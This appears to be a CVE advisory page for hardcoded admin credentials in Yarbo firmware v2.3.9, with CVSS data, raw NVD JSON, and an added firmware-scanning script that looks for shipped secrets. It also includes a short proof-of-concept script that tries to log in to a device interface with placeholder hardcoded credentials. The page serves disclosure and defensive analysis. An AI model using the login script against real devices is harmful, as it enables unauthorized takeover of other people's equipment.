Security Vulnerability Report
CVE-2026-7414 CVSS 9.8 CRITICAL

Published: 2026-05-07 17:15:59
Last Modified: 2026-05-07 18:46:26

Description

Yarbo firmware v2.3.9 contains hardcoded administrative credentials embedded in the firmware image. These credentials are identical across all devices running this firmware and cannot be changed or removed by end users, enabling trivial unauthorized access to device management interfaces by anyone who knows them.
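The defect class here is CWE-798: a credential baked into the image, so every unit ships the same secret and the owner has no way to rotate it. The script below is an added example, not code from the advisory or from Yarbo. It assumes the firmware has already been unpacked to a directory tree (for instance with binwalk and unsquashfs) and walks that tree for the three places such material usually lives: crypt-style hashes in /etc/shadow-like files, literal password/key assignments in configs, scripts and web assets, and pre-encoded HTTP Basic headers. It then intersects the findings from two captured images, because a secret that is byte-identical across independently obtained devices is exactly the "identical across all devices" condition the description states, as opposed to a per-device provisioned credential. All file names, contents and the hash value are constructed for the demonstration.

```python
"""Triage an unpacked firmware root for hardcoded credentials (CWE-798).

Added example, not code from the advisory or from Yarbo. Assumes the image
has been unpacked into a directory; the sample files it writes are constructed.
"""
import math
import re
import tempfile
from pathlib import Path

# Hashed local accounts, literal password/key assignments, pre-encoded Basic auth.
SHADOW_ENTRY = re.compile(rb"^([a-z_][a-z0-9_-]*):(\$[0-9a-z]+\$[^:\n]+):", re.M)
CRED_ASSIGN = re.compile(
    rb'(?i)\b(passw(?:or)?d|pwd|secret|api[_-]?key|token)\b\s*[:=]\s*["\']?([^\s"\';,]{4,})'
)
BASIC_AUTH = re.compile(rb"(?i)authorization:\s*basic\s+([A-Za-z0-9+/=]{8,})")

SKIP_SUFFIXES = {".png", ".jpg", ".gif", ".mp3", ".ko"}  # media/kernel objects: too noisy
MAX_FILE_BYTES = 4 * 1024 * 1024

# Constructed, deliberately fake crypt(3)-style hash used by the sample images below.
FAKE_HASH = "$6$samplesalt$NOTAREALHASH.constructed.for.this.example"


def shannon_entropy(data: bytes) -> float:
    """Bits per byte; values near 4+ flag random-looking secrets such as API keys."""
    if not data:
        return 0.0
    n = len(data)
    return -sum(c / n * math.log2(c / n) for c in (data.count(b) for b in set(data)))


def scan_bytes(rel_path: str, data: bytes) -> list[dict]:
    """Return one finding per credential-looking match in a single file."""
    out = []
    for m in SHADOW_ENTRY.finditer(data):
        out.append({"file": rel_path, "kind": "shadow_hash",
                    "key": m.group(1).decode(), "value": m.group(2).decode()})
    for m in CRED_ASSIGN.finditer(data):
        val = m.group(2)
        out.append({"file": rel_path, "kind": "assignment", "key": m.group(1).decode().lower(),
                    "value": val.decode(errors="replace"), "entropy": round(shannon_entropy(val), 2)})
    for m in BASIC_AUTH.finditer(data):
        out.append({"file": rel_path, "kind": "basic_auth",
                    "key": "authorization", "value": m.group(1).decode()})
    return out


def scan_tree(root: Path) -> list[dict]:
    """Walk an unpacked rootfs and collect findings, skipping media and very large files."""
    findings = []
    for path in sorted(p for p in root.rglob("*") if p.is_file()):
        if path.suffix.lower() in SKIP_SUFFIXES or path.stat().st_size > MAX_FILE_BYTES:
            continue
        findings.extend(scan_bytes(path.relative_to(root).as_posix(), path.read_bytes()))
    return findings


def shared_across_images(per_image: dict[str, list[dict]]) -> list[tuple]:
    """(file, key, value) triples identical in every image: the fleet-wide hardcoded case.

    Per-device provisioned secrets differ between units, so they drop out of the intersection.
    """
    if not per_image:
        return []
    sets = [{(f["file"], f["key"], f["value"]) for f in fs} for fs in per_image.values()]
    return sorted(set.intersection(*sets))


def build_sample_image(root: Path, admin_hash: str) -> Path:
    """Write a tiny constructed rootfs (not real Yarbo files) and return its path."""
    (root / "etc").mkdir(parents=True)
    (root / "etc" / "shadow").write_bytes(
        b"root:*:19000:0:99999:7:::\n"
        + f"admin:{admin_hash}:19000:0:99999:7:::\n".encode()
        + b"nobody:!:19000:0:99999:7:::\n"
    )
    (root / "www").mkdir()
    (root / "www" / "app.js").write_bytes(
        b'const cfg = {\n  endpoint: "/api/v1",\n'
        b'  password: "example-dev-secret-0001",  // same literal on every unit\n};\n'
    )
    (root / "README").write_bytes(b"Set a strong password on first boot.\n")  # prose, no finding
    return root


def demo(same_admin_hash: bool = True) -> dict:
    """Scan two constructed device images and report what they have in common."""
    with tempfile.TemporaryDirectory() as tmp:
        a = build_sample_image(Path(tmp) / "device_a", FAKE_HASH)
        b = build_sample_image(Path(tmp) / "device_b",
                               FAKE_HASH if same_admin_hash else "$6$othersalt$DIFFERENT.fake.value")
        per_image = {"device_a": scan_tree(a), "device_b": scan_tree(b)}
        return {"findings_a": per_image["device_a"], "shared": shared_across_images(per_image)}


if __name__ == "__main__":
    result = demo()
    for f in result["findings_a"]:
        print(f"{f['file']}: {f['kind']} {f['key']}={f['value']}")
    print("identical across images:", result["shared"])
```

Run against real unpacked images, point `scan_tree` at each rootfs and feed the results to `shared_across_images`; anything it returns is a credential the vendor shipped identically to every unit, which is the finding to report. Expect noise from the assignment pattern on large web bundles; the entropy field helps rank it.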

CVSS Details

CVSS Score
9.8
Severity
CRITICAL
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H

Configurations (Affected Products)

No CPE configuration data is available yet (NVD status: Awaiting Analysis). Affected product per the description:

Yarbo Firmware v2.3.9

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
```python
import requests

# Target URL (example)
target_url = "http://<target_ip>/login"

# Hardcoded credentials found in firmware v2.3.9. These are placeholders: the
# advisory does not publish the real values; substitute what was extracted
# from the firmware image.
username = "admin"
password = "hardcoded_secret_password"


def exploit():
    print(f"[*] Attempting to login to {target_url}...")
    session = requests.Session()

    # Payload with hardcoded credentials
    payload = {
        "username": username,
        "password": password,
    }

    try:
        response = session.post(target_url, data=payload, timeout=5)
        # Check for successful login indicators (e.g., HTTP 200, specific token)
        if response.status_code == 200 and "dashboard" in response.text:
            print("[+] Login successful! Hardcoded credentials are valid.")
            print("[+] Access granted to device management interface.")
        else:
            print("[-] Login failed or target unreachable.")
    except requests.RequestException as e:
        print(f"[-] An error occurred: {e}")


if __name__ == "__main__":
    exploit()
```

References

https://github.com/Bin4ry/yarbo-nat-in-my-back-yard
https://github.com/Bin4ry/yarbo-nat-in-my-back-yard#3--hardcoded-developer-credentials-in-production-apk
https://takeonme.org/gcves/GCVE-1337-2026-00000000000000000000000000000000000000000000000001111111111100011111111111000000000000000000000000000000000000000000000000000001000

Raw JSON Data

```json
{
  "cve": {
    "id": "CVE-2026-7414",
    "sourceIdentifier": "[email protected]",
    "published": "2026-05-07T17:15:59.460",
    "lastModified": "2026-05-07T18:46:25.867",
    "vulnStatus": "Awaiting Analysis",
    "cveTags": [],
    "descriptions": [
      {
        "lang": "en",
        "value": "Yarbo firmware v2.3.9 contains hardcoded administrative credentials embedded in the firmware image. These credentials are identical across all devices running this firmware and cannot be changed or removed by end users, enabling trivial unauthorized access to device management interfaces by anyone who knows them."
      }
    ],
    "metrics": {
      "cvssMetricV31": [
        {
          "source": "[email protected]",
          "type": "Secondary",
          "cvssData": {
            "version": "3.1",
            "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
            "baseScore": 9.8,
            "baseSeverity": "CRITICAL",
            "attackVector": "NETWORK",
            "attackComplexity": "LOW",
            "privilegesRequired": "NONE",
            "userInteraction": "NONE",
            "scope": "UNCHANGED",
            "confidentialityImpact": "HIGH",
            "integrityImpact": "HIGH",
            "availabilityImpact": "HIGH"
          },
          "exploitabilityScore": 3.9,
          "impactScore": 5.9
        }
      ]
    },
    "weaknesses": [
      {
        "source": "[email protected]",
        "type": "Secondary",
        "description": [
          {
            "lang": "en",
            "value": "CWE-798"
          }
        ]
      }
    ],
    "references": [
      {
        "url": "https://github.com/Bin4ry/yarbo-nat-in-my-back-yard",
        "source": "[email protected]"
      },
      {
        "url": "https://takeonme.org/gcves/GCVE-1337-2026-00000000000000000000000000000000000000000000000001111111111100011111111111000000000000000000000000000000000000000000000000000001000",
        "source": "[email protected]"
      },
      {
        "url": "https://github.com/Bin4ry/yarbo-nat-in-my-back-yard#3--hardcoded-developer-credentials-in-production-apk",
        "source": "134c704f-9b21-4f2e-91b3-4a467353bcc0"
      }
    ]
  }
}
```